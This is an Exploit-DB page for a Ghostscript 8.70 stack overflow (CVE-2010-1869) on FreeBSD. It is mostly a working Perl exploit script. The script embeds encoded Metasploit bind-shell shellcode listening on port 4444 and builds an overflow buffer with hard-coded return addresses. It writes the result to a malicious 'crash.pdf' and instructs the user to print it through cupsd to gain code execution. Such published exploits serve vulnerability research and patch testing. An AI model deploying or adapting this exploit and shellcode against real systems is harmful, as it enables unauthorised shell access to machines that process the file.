Ghostscript - '.PostScript' File Stack Overflow

EDB-ID:

14406

CVE:

2010-1869

EDB Verified:

Author:

Rodrigo Rubira Branco

Type:

local

Exploit:   /  

Platform:

BSD

Date:

2010-07-18

Vulnerable App: 
##########################################################################
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com>		 #
#									 #
# GhostScript Stack Overflow 						 #
#									 #	
##########################################################################

# bsd/x86/shell_bind_tcp - 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false, 
# PrependSetuid=false, LPORT=4444, RHOST=, 
# PrependSetreuid=false
my $buf = 
"\x54\x5a\xda\xd1\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43" .
"\x43\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x50\x31\x49\x50" .
"\x46\x30\x45\x38\x4b\x4f\x44\x42\x42\x31\x51\x4c\x4d\x59" .
"\x4b\x57\x50\x50\x43\x5a\x45\x51\x42\x4a\x44\x42\x42\x4a" .
"\x44\x50\x4e\x50\x45\x31\x48\x4d\x4b\x30\x51\x47\x46\x30" .
"\x46\x30\x43\x5a\x45\x38\x51\x48\x48\x4d\x4b\x30\x4d\x59" .
"\x51\x57\x4a\x4c\x48\x30\x43\x5a\x48\x4d\x4d\x50\x4e\x50" .
"\x45\x4e\x48\x4d\x4d\x50\x50\x50\x50\x50\x43\x5a\x51\x4a" .
"\x50\x58\x48\x4d\x4d\x50\x4b\x4f\x50\x4f\x4a\x44\x43\x49" .
"\x4b\x46\x46\x30\x42\x48\x46\x4f\x46\x4f\x44\x33\x42\x48" .
"\x43\x58\x46\x4f\x43\x52\x45\x39\x42\x4e\x4b\x39\x4b\x53" .
"\x46\x30\x46\x34\x50\x53\x50\x50\x48\x30\x47\x4b\x48\x4d" .
"\x4d\x50\x41\x41";

$pkt = "e!PS".
"A" x 500 . "00001111222233334444555556666777788889999aaa".
"\x40\xd9\xbf\xbf". #Shellcode Addr
"bccccddd".
"\xef\xbe\xbf\xbf".
"ffff".
"\xff\xbf" x 100 .
"C" x (1200 - length($buf)) . $buf . "Z" x 100; 

print STDERR "Check Point Vulnerability Discovery Team (VDT)\n";
print STDERR "GhostScript 8.70 exploit for FreeBSD 8.0!\n";
print STDERR "Rodrigo Rubira Branco (BSDaemon)\n";

print STDERR "\nCreating evil pdf ...";

open(F,">crash.pdf");

print F $pkt;

close(F);

print STDERR " d0ne!\n";
print "Now print it via cupsd!\n";
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services